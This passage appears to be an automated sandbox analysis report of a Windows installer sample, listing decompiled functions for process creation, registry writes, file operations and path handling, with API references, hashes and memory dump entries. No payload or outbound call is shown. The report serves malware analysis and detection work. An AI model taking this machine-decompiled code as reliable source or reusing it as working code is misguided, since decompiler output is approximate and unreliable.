							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                          0x00401ea2
                                                                          0x00401ea7
                                                                          0x00401eb2
                                                                          0x00401eb9
                                                                          0x00401ebc
                                                                          0x004026da
                                                                          0x00401ec2
                                                                          0x00401ec5
                                                                          0x00401ed6
                                                                          0x00401ed1
                                                                          0x00401ed1
                                                                          0x00401eeb
                                                                          0x00401ef4
                                                                          0x00401f04
                                                                          0x00401f06
                                                                          0x00401f06
                                                                          0x00401ef6
                                                                          0x00401efa
                                                                          0x00401efa
                                                                          0x00401ef4
                                                                          0x00401f0d
                                                                          0x00401f10
                                                                          0x00401f10
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                            • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                            • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                            • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                          • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                          • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 4003922372-501415292
                                                                          • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                          • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                          • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                          • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                                                          0x00405250
                                                                          0x0040525a
                                                                          0x00405265
                                                                          0x0040526b
                                                                          0x0040526b
                                                                          0x00405283
                                                                          0x0040528b
                                                                          0x00405290
                                                                          0x00000000
                                                                          0x00405296
                                                                          0x0040529a

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                          • CloseHandle.KERNEL32(?), ref: 00405290
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405247
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: AttributesCloseCreateFileHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 2000254098-66219284
                                                                          • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                          • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                          • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                          • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                          0x004054cd
                                                                          0x004054e4
                                                                          0x004054ec
                                                                          0x004054ec
                                                                          0x004054f4

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-3916508600
                                                                          • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                          • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










                                                                          0x00402387
                                                                          0x0040238c
                                                                          0x00402396
                                                                          0x004023a0
                                                                          0x004023a3
                                                                          0x004023b5
                                                                          0x004023bc
                                                                          0x004023c4
                                                                          0x004023d2
                                                                          0x004023d6
                                                                          0x004023e1
                                                                          0x004023e1
                                                                          0x004023e5
                                                                          0x004023e9
                                                                          0x004023ef
                                                                          0x004023f4
                                                                          0x004023f4
                                                                          0x004023f8
                                                                          0x00402404
                                                                          0x00402404
                                                                          0x0040241d
                                                                          0x0040241f
                                                                          0x0040241f
                                                                          0x00402422
                                                                          0x004024fb
                                                                          0x004024fb
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                          • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1356686001-0
                                                                          • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                          • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                          • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                          • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                                          0x00401f50
                                                                          0x00401f53
                                                                          0x00401f5b
                                                                          0x00401f60
                                                                          0x00401f65
                                                                          0x00401f69
                                                                          0x00401f6c
                                                                          0x00401f6e
                                                                          0x00401f75
                                                                          0x00401f7e
                                                                          0x00401f86
                                                                          0x00401f89
                                                                          0x00401f9e
                                                                          0x00401fa4
                                                                          0x00401fb7
                                                                          0x00401fc0
                                                                          0x00401fcc
                                                                          0x00401fd1
                                                                          0x00401fd1
                                                                          0x00401fb7
                                                                          0x00401fd4
                                                                          0x00401be1
                                                                          0x00401be1
                                                                          0x00401f89
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                            • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 1404258612-0
                                                                          • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                          • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                          • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                          • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                                          0x004021fc
                                                                          0x00402200
                                                                          0x00402208
                                                                          0x0040220e
                                                                          0x00402211
                                                                          0x0040221e
                                                                          0x0040222f
                                                                          0x00402233
                                                                          0x0040223a
                                                                          0x00402243
                                                                          0x0040224b
                                                                          0x0040224e
                                                                          0x00402251
                                                                          0x00402255
                                                                          0x00402266
                                                                          0x0040226f
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrlenA.KERNEL32 ref: 00402218
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                          • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                          • String ID:
                                                                          • API String ID: 3674637002-0
                                                                          • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                          • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                          • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                          • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                          0x00405568
                                                                          0x0040556f
                                                                          0x00405572
                                                                          0x00405577
                                                                          0x0040558a
                                                                          0x004055a4
                                                                          0x00000000
                                                                          0x004055a4
                                                                          0x0040558e
                                                                          0x0040558f
                                                                          0x00405592
                                                                          0x00405593
                                                                          0x0040559b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040559d
                                                                          0x004055a0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004055a0
                                                                          0x00000000
                                                                          0x00405580
                                                                          0x00000000
                                                                          0x00405581

                                                                          APIs
                                                                          • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040556D
                                                                          • CharNextA.USER32(00000000), ref: 00405572
                                                                          • CharNextA.USER32(00000000), ref: 00405581
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharNext
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3213498283-3916508600
                                                                          • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                          • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                          • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                          0x00401d9c
                                                                          0x00401db5
                                                                          0x00401dbf
                                                                          0x00401dc4
                                                                          0x00401dcf
                                                                          0x00401dd6
                                                                          0x00401de8
                                                                          0x00401dee
                                                                          0x00401df3
                                                                          0x00401dfd
                                                                          0x00402536
                                                                          0x00401581
                                                                          0x004028d7
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D95
                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                          • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
